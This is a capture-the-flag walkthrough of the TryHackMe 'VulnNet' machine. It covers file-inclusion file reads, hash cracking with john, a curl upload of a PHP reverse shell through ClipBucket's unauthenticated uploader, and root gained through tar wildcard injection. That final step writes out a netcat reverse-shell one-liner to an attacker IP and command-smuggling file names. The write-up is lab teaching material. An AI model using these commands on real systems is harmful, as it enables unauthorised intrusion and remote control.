Content:
1. Introduction
2. Scanning and Enumeration
3. Initial Footholds
4. Escalating Privileges
5. Conclusion
Introduction:
VulNet is a medium difficulty box. Solving this box will add “LFI, vhost enumeration, enumerating Apache config files, hash cracking, exploiting file upload vulnerability, privilege escalating” to ones skill set.
This box is based on “CLIPBUCKET” unauthenticated file upload vulnerability.
Scanning and Enumeration:
Ones the machine is up and running as usual we start with a “NMAP” scan or alternatively can use rustscan either, but before that don’t forget to add vulnnet.thm to your /etc/hosts files.
$ nmap -v -sV -sC {machine-ip}
Nmap scan give us 2 ports open 22 and 80, running SSH and HTTP Apache respectively.
Here is only one choice to move forward with i.e. enumerating web host.
Ones we fire vulnnet.thm on our favorite browser, we land up on a simple web page, where the sign-in page looks like to be potentially vulnerable.
Before starting to enumerate through the page, i have fired up “Director Buster” to check if there are any hidden pages available.
While trying to exploit Log-in portal which was a dead end there because Dirbuster also couldn’t find anything, then i came across through two java script files while sneaking though source code.
When i enumerated above 2 js files i found a virtual host “broadcast.vulnnet.thm” and “vulnnet.thm/index.php?referer=”, referer parameter seems to be vulnerable to “File Inclusion Vulnerability”.
Note:- While enumerating js files i used js beautifier to make code easy to read and understand.
Here tried to read some common linux files like /etc/passwd, and was successful to read files.
As i knew that it was an Apache server, so i tried to read config files, where .htpasswd file gave me a user and a password hash.
developer:[REDACTED].
When we have found any hash first we do is to try cracking that hash, so did i do.
$john — wordlist=/usr/share/wordlist/rockyou.txt [hashfile]
While john was doing its work, i added “broadcast.vulnnet.thm” to /etc/hosts and headed towards to enumerate, there i got prompted to authenticate login.
Ones john was done, i used user:password combination to login to the vhost, and was successfully logged-in.
Vhost was hosting “ClipBucket”. looking around a bit through hosted app and source code i found the version no, and luckily this version was vulnerable.
Searching through web i found how to exploit it, there was unauthenticated file upload vulnerability.
Initial Footholds:
Till now we know what is the vulnerability, let’s dive in how to exploit it.
Here, what we have to do is get a php-reverse-shell (pentestmonkey), start listener on our machine.
The command below will upload our reverse shell on the box.
$ curl -F “file=@rev.php” -F “plupload=1” -F “name=anyname.php” “http://broadcast.vulnnet.thm/actions/photo_uploader.php" -u developers:[REDACTED]
Now we just have to access this file and will be prompted with a reverse shell on our machine.
We can access uploaded file in /files/photos/[file directory]
We got initial shell on the box.
Stabilizing our shell.
$ python3 -c “import pty;pty.spawn(‘/bin/bash’)”
$ export TERM=xterm
Before running any scripts like Linpeas or Enum4linux i tried manual enumeration and found a ssh-backup backup file belonging to server-management user and downloaded that file to retrieve rsa hash.
Attacking machine(THM):
$ python3 -m http.serverAttacker machine:
$ wget http://[machine-ip]:8000/ssh-backup.tar.gz
$ tar -xvf ssh-backup.tar.gz
Now although we have id_rsa file for the user but we need to crack the hash to get pass code before connecting through ssh.
$ python3 ssh2john id_rsa > id_rsa_hash
$ john — wordlist=/usr/share/wordlists/rockyou.txt
$ sudo chmod 600 id_rsa
$ ssh -i id_rsa server-management@vulnnet.thm
Here i have successfully got access to server-management user where user flag could be found.
Now, Heading towards taking over root access.
Privilege Escalation:
Again before i go and run any automated enumeration script, i tried to manually enumerating if i can find any cronjob file, backup file or root executable file with write permissions to current user.
Walking around i found a cronjob which is executing “/var/opt/backupsrv.sh” script.
looking through the file there in opt directory the file is readable by current user.
Reading through the script, i figured out what that script is doing.
Basically that script was backing up any file present in Documents directory of server-management user.
There is one thing which is interesting and could get us to root.
The script uses tar to backup file and since it uses wildcard (*), which is vulnerable to wild card injection. Learn More
To gain final root shell on the box i created a reverse shell file in Document folder and started a listener on my own machine to get shell.
$ echo “mkfifo /tmp/obz; nc [Attackers-ip] 4445 0/tmp/obz 2>&1; rm /tmp/obz” > shell.sh
$ echo “” > “ — checkpoint-action=exec=sh shell.sh”
$ echo “” > — checkpoint=1
In around 30–40 seconds shell is prompted.
Finally rooted.
Conclusion:
The box was not much difficult, involved a bit of enumeration in initial phases.
- The web server was mis-configured, front-end could read sensitive java script files, which lead to LFI.
- Server was running an older and vulnerable version.
- Inappropriate read/write permissions i.e. mis-configuration of back-end server.
Thanks to the creator of this box TheCyb3rW0lf
To learn and practice more visit TryHackMe
Thanks for reading.
Clap for me, if the above content made you explore something.
